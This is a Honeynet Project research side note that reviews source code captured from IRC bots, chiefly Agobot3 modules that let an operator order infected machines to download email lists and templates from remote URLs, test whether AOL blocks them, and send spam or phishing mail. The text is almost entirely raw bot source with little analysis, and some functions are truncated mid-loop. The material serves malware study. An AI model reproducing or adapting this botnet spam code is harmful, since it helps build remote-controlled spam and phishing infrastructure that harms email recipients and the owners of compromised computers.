Honeynet Project
http://www.honeynet.org
Last Modified: 14th May 2005
In this side note will will review the source code of some bots captured during our research and show several examples of how bots are being used to send out spam and phishing emails.
[...] else if (strcmp("email", a[s]) == 0 ) { WORD version = MAKEWORD(1,1); WSADATA wsaData; char server[256], sender_email[256], recp_email[256], subject[256], myBuf[256], BigBuf[1024]; int port, nRet; strcpy(server,a[s+1]); port = atoi(a[s+2]); strcpy(sender_email,a[s+3]); strcpy(recp_email,a[s+4]); strcpy(subject,replacestr(a[s+5],"_"," ")); fWSAStartup(version, &wsaData); LPHOSTENT lpHostEntry; lpHostEntry = fgethostbyname(server); SOCKET MailSocket; MailSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP); SOCKADDR_IN saServer; saServer.sin_family = AF_INET; saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list); saServer.sin_port = fhtons((unsigned short)port); sprintf(BigBuf,"helo $rndnick\nmail from: <%s>\nrcpt to: <%s>\ndata\nsubject: %s\nfrom: %s\n%s\n.\n",sender_email,recp_email,subject,sender_email,subject); nRet = fconnect(MailSocket, (LPSOCKADDR)&saServer, sizeof(saServer)); nRet = frecv(MailSocket, myBuf, sizeof(myBuf), 0); nRet = fsend(MailSocket, BigBuf, strlen(myBuf), 0); nRet = frecv(MailSocket, myBuf, sizeof(myBuf), 0); fclosesocket(MailSocket); fWSACleanup(); sprintf(sendbuf, "[EMAIL]: Message sent to %s.",recp_email); if (!silent) irc_privmsg(sock, a[2], sendbuf, notice); addlog(sendbuf); return repeat; } [...]
bool CanSpamAOL() { int iRnd=brandom(1, 4); char *szDNS; int iIsMsg_Matched=0; // How much the AOL blocking message has been matched in % // 25% are for occurence of string "postmaster.info.aol.com" // 20% are for an immediate 554 // 10% are for a line count of 5 // 10% are for occurence of string "(RTR:DU)" // 10% are for occurence of string "not accept" // 5% are for occurence of string "dynamic" (occurs 2 times) // 5% are for occurence of string "residential" (occurs 2 times) // 5% are for occurence of string "are using to" switch(iRnd) { case 1: szDNS="mailin-01.mx.aol.com"; break; case 2: szDNS="mailin-02.mx.aol.com"; break; case 3: szDNS="mailin-03.mx.aol.com"; break; case 4: szDNS="mailin-04.mx.aol.com"; break; default: #ifdef DBGCONSOLE g_cMainCtrl.m_cConsDbg.Log(9, "CanSpamAOL(): Unknown value %d in switch statement.\n", iRnd); #endif break; } int sAOLSock=DoTcpConnect(szDNS, 25); if(sAOLSock==SOCKET_ERROR) return false; int iCount=0; char szBuf[4096]; while(recv_line(sAOLSock, szBuf, sizeof(szBuf))) { if(strstr(szBuf, "220-") && strstr(szBuf, "ESMTP")) break; if(strstr(szBuf, "postmaster.info.aol.com")) iIsMsg_Matched+=25; if(strstr(szBuf, "554-") && iCount==1) iIsMsg_Matched+=20; if(strstr(szBuf, "(RTR:DU)")) iIsMsg_Matched+=10; if(strstr(szBuf, "not accept")) iIsMsg_Matched+=10; if(strstr(szBuf, "dynamic")) iIsMsg_Matched+=5; if(strstr(szBuf, "residential")) iIsMsg_Matched+=5; if(strstr(szBuf, "are using to")) iIsMsg_Matched+=5; iCount++; } if(iCount==5) iIsMsg_Matched+=10; xWrite(sAOLSock, "QUIT\n", sizeof("QUIT\n")); bool bRetVal=false; if(iIsMsg_Matched <= 5) bRetVal=true; xClose(sAOLSock); return bRetVal; }
/* Agobot3 - a modular IRC bot for Win32 / Linux Copyright (c) 2003 Ago All rights reserved. This is private software, you may redistribute it under the terms of the APL(Ago's Private License) which follows: Redistribution and use in binary forms, with or without modification, are permitted provided that the following conditions are met: 1. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. 2. The binary may not be sold and/or given away for free. 3. The licensee may only create binaries for his own usage, not for any third parties. Redistribution and use in source forms, with or without modification, are not permitted. THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include "main.h" #include "mainctrl.h" #include "smtp_logic.h" #include "smtp.h" CSMTP_Logic::CSMTP_Logic() { m_szType="CSMTP_Logic"; m_lEmails.clear(); m_sEmailTemplate.Assign(""); m_bSpamming=false; m_bTemplateSet=false; } CSMTP_Logic::~CSMTP_Logic() { m_lEmails.clear(); m_sEmailTemplate.Assign(""); m_bSpamming=false; m_bTemplateSet=false; } void CSMTP_Logic::Init() { REGCMD(m_cmdSetList, "spam.setlist", "downloads an email list", false, this); REGCMD(m_cmdSetTemplate, "spam.settemplate", "downloads an email template", false, this); REGCMD(m_cmdStart, "spam.start", "starts the spamming", false, this); REGCMD(m_cmdStop, "spam.stop", "stops the spamming", false, this); REGCVAR(spam_maxthreads, "8", "Spam Logic - Number of threads", false, 0); REGCVAR(spam_htmlemail, "true", "Spam Logic - Send HTML emails", false, 0); } bool CSMTP_Logic::HandleCommand(CMessage *pMsg) { if(!pMsg->sCmd.Compare("spam.setlist")) { m_sListURL.Assign(pMsg->sChatString.Token(1, " ")); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Downloading new email list.", pMsg->sReplyTo.Str()); SetList(m_sListURL); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Finished downloading new email list.", pMsg->sReplyTo.Str()); return true; } else if(!pMsg->sCmd.Compare("spam.settemplate")) { m_sTemplateURL.Assign(pMsg->sChatString.Token(1, " ")); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Downloading new email template.", pMsg->sReplyTo.Str()); SetTemplate(m_sTemplateURL); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Finished downloading new email template.", pMsg->sReplyTo.Str()); return true; } else if(!pMsg->sCmd.Compare("spam.start")) { m_bSpamming=true; g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Started spamming.", pMsg->sReplyTo.Str()); return true; } else if(!pMsg->sCmd.Compare("spam.stop")) { m_bSpamming=false; g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Stopped spamming.", pMsg->sReplyTo.Str()); return true; } return false; } void CSMTP_Logic::SetList(CString &sURL) { try { url uURL; CDownloadHelper *pDldHlp=new CDownloadHelper; if(!ParseURL(sURL, &uURL)) return; pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq); pDldHlp->m_sTarget.Assign("list.tmp"); pDldHlp->m_sReplyTo.Assign(""); pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false; pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false; pDldHlp->Run(); delete pDldHlp; FILE *fp=fopen("list.tmp", "rb"); if(!fp) return; int iFileSize=GetFileSize(fp); char *szList=new char[iFileSize+1]; memset(szList, 0, iFileSize+1); fread(szList, sizeof(char), iFileSize, fp); CString sList(szList); char *szListCopy=sList.Str(), *szTemp; while(true) { char *szCRLF=strstr(szListCopy, "\r"); if(!szCRLF) szCRLF=strstr(szListCopy, "\n"); if(!szCRLF) break; while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; } while(*szCRLF=='\n') { *szCRLF='\0'; szCRLF++; } while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; } char *szToken=szListCopy; szListCopy=szCRLF; if(!strcmp(szToken, "")) continue; m_lEmails.push_back(CString(szToken)); } delete [] szList; fclose(fp); DeleteFile("list.tmp"); #ifdef PtW32CatchAll } PtW32CatchAll { #else } catch(...) { #endif // Bla } } void CSMTP_Logic::SetTemplate(CString &sURL) { try { url uURL; CDownloadHelper *pDldHlp=new CDownloadHelper; if(!ParseURL(sURL, &uURL)) return; pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq); pDldHlp->m_sTarget.Assign("template.tmp"); pDldHlp->m_sReplyTo.Assign(""); pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false; pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false; pDldHlp->Run(); delete pDldHlp; FILE *fp=fopen("template.tmp", "rb"); if(!fp) return; int iFileSize=GetFileSize(fp); char *szTemplate=new char[iFileSize+1]; memset(szTemplate, 0, iFileSize+1); while(!feof(fp)) { fgets(szTemplate, iFileSize, fp); CString sTemplate(szTemplate); if(sTemplate.Find('\r', 0)) { sTemplate[sTemplate.Find('\r', 0)-1]='\0'; } if(sTemplate.Find('\n', 0)) { sTemplate[sTemplate.Find('\n', 0)-1]='\0'; } if(!sTemplate.Mid(0, 4).Compare("data")) break; if(!sTemplate.Token(0, " ").Compare("from")) { m_sEmailSrc.Assign(sTemplate.Token(1, " ", true)); } if(!sTemplate.Token(0, " ").Compare("from_full")) { m_sEmailSrcFull.Assign(sTemplate.Token(1, " ", true)); } if(!sTemplate.Token(0, " ").Compare("subject")) { m_sSubject.Assign(sTemplate.Token(1, " ", true)); } } CString sDataTmp(""); while(!feof(fp)) { fgets(szTemplate, iFileSize, fp); CString sTemplate(szTemplate); if(sTemplate.Find('\r', 0)) { sTemplate[sTemplate.Find('\r', 0)-1]='\0'; } if(sTemplate.Find('\n', 0)) { sTemplate[sTemplate.Find('\n', 0)-1]='\0'; } sDataTmp.Append(sTemplate); sDataTmp.Append("\r\n"); } m_sData.Assign(sDataTmp); m_sEmailTemplate.Assign(""); delete [] szTemplate; fclose(fp); DeleteFile("template.tmp"); m_bTemplateSet=true; #ifdef PtW32CatchAll } PtW32CatchAll { #else } catch(...) { #endif // Bla } } void *CSMTP_Logic::Run() { return NULL; while(true) { try { int iNumThreads=spam_maxthreads.iValue; CSMTP_Sender *pSenders=new CSMTP_Sender[iNumThreads]; // Spam loop while(m_bSpamming && m_bTemplateSet) { // Loop through all available threads for(int i=0; isCmd.Compare("aolspam.setlist")) { m_sListURL.Assign(pMsg->sChatString.Token(1, " ")); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Downloading new email list.", pMsg->sReplyTo.Str()); SetList(m_sListURL); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Finished downloading new email list.", pMsg->sReplyTo.Str()); return true; } else if(!pMsg->sCmd.Compare("aolspam.settemplate")) { m_sTemplateURL.Assign(pMsg->sChatString.Token(1, " ")); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Downloading new email template.", pMsg->sReplyTo.Str()); SetTemplate(m_sTemplateURL); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Finished downloading new email template.", pMsg->sReplyTo.Str()); return true; } if(!pMsg->sCmd.Compare("aolspam.setuser")) { SetUser(pMsg->sChatString.Token(1, " ")); return true; } else if(!pMsg->sCmd.Compare("aolspam.setpass")) { SetPassword(pMsg->sChatString.Token(1, " ")); return true; } else if(!pMsg->sCmd.Compare("aolspam.start")) { m_bSpamming=true; g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Started spamming.", pMsg->sReplyTo.Str()); return true; } else if(!pMsg->sCmd.Compare("aolspam.stop")) { m_bSpamming=false; g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Stopped spamming.", pMsg->sReplyTo.Str()); return true; } return false; } void CAOL_Logic::SetList(CString &sURL) { try { url uURL; CDownloadHelper *pDldHlp=new CDownloadHelper; if(!ParseURL(sURL, &uURL)) return; pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq); pDldHlp->m_sTarget.Assign("list.tmp"); pDldHlp->m_sReplyTo.Assign(""); pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false; pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false; pDldHlp->Run(); delete pDldHlp; FILE *fp=fopen("list.tmp", "rb"); if(!fp) return; int iFileSize=GetFileSize(fp); char *szList=new char[iFileSize+1]; memset(szList, 0, iFileSize+1); fread(szList, sizeof(char), iFileSize, fp); CString sList(szList); char *szListCopy=sList.Str(), *szTemp; while(true) { char *szCRLF=strstr(szListCopy, "\r"); if(!szCRLF) szCRLF=strstr(szListCopy, "\n"); if(!szCRLF) break; while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; } while(*szCRLF=='\n') { *szCRLF='\0'; szCRLF++; } while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; } char *szToken=szListCopy; szListCopy=szCRLF; if(!strcmp(szToken, "")) continue; m_lEmails.push_back(CString(szToken)); } delete [] szList; fclose(fp); DeleteFile("list.tmp"); #ifdef PtW32CatchAll } PtW32CatchAll { #else } catch(...) { #endif // Bla } } void CAOL_Logic::SetTemplate(CString &sURL) { try { url uURL; CDownloadHelper *pDldHlp=new CDownloadHelper; if(!ParseURL(sURL, &uURL)) return; pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq); pDldHlp->m_sTarget.Assign("template.tmp"); pDldHlp->m_sReplyTo.Assign(""); pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false; pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false; pDldHlp->Run(); delete pDldHlp; FILE *fp=fopen("template.tmp", "rb"); if(!fp) return; int iFileSize=GetFileSize(fp); char *szTemplate=new char[iFileSize+1]; memset(szTemplate, 0, iFileSize+1); while(!feof(fp)) { fgets(szTemplate, iFileSize, fp); CString sTemplate(szTemplate); if(sTemplate.Find('\r', 0)) { sTemplate[sTemplate.Find('\r', 0)-1]='\0'; } if(sTemplate.Find('\n', 0)) { sTemplate[sTemplate.Find('\n', 0)-1]='\0'; } if(!sTemplate.Mid(0, 4).Compare("data")) break; if(!sTemplate.Token(0, " ").Compare("from")) { m_sEmailSrc.Assign(sTemplate.Token(1, " ", true)); } if(!sTemplate.Token(0, " ").Compare("from_full")) { m_sEmailSrcFull.Assign(sTemplate.Token(1, " ", true)); } if(!sTemplate.Token(0, " ").Compare("subject")) { m_sSubject.Assign(sTemplate.Token(1, " ", true)); } } CString sDataTmp(""); while(!feof(fp)) { fgets(szTemplate, iFileSize, fp); CString sTemplate(szTemplate); if(sTemplate.Find('\r', 0)) { sTemplate[sTemplate.Find('\r', 0)-1]='\0'; } if(sTemplate.Find('\n', 0)) { sTemplate[sTemplate.Find('\n', 0)-1]='\0'; } sDataTmp.Append(sTemplate); sDataTmp.Append("\r\n"); } m_sData.Assign(sDataTmp); m_sEmailTemplate.Assign(""); delete [] szTemplate; fclose(fp); DeleteFile("template.tmp"); m_bTemplateSet=true; #ifdef PtW32CatchAll } PtW32CatchAll { #else } catch(...) { #endif // Bla } } void CAOL_Logic::SetUser(CString &sUser) { m_sUser.Assign(sUser); } void CAOL_Logic::SetPassword(CString &sPass) { m_sPass.Assign(sPass); } void *CAOL_Logic::Run() { return NULL; while(true) { try { int iNumThreads=aolspam_maxthreads.iValue; CAOLWebMail *pSenders=new CAOLWebMail[iNumThreads]; // Spam loop while(m_bSpamming && m_bTemplateSet) { // Loop through all available threads for(int i=0; i
Click here to return to the main paper.